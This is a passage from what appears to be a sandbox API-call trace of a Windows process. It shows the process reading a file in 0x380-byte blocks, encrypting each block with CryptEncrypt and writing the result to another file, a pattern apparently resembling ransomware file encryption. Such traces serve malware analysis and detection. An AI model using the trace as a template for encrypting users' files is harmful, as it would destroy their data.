nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.600] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.601] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.601] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.601] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.601] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.601] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.601] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.602] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.602] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.602] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.602] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.602] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.602] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.602] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.602] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.602] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.602] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.602] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.602] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.602] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.603] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.603] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.603] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.603] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.603] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.603] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.603] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.603] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.603] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.603] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.603] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.603] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.603] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.604] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.604] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.604] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.604] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.604] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.604] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.604] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.604] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.604] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.604] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.604] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.604] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.604] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.604] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.605] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.605] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.605] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.605] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.605] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.605] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.606] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.606] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.606] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.606] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.606] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.607] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.607] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.607] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.607] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.607] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.607] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.607] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, 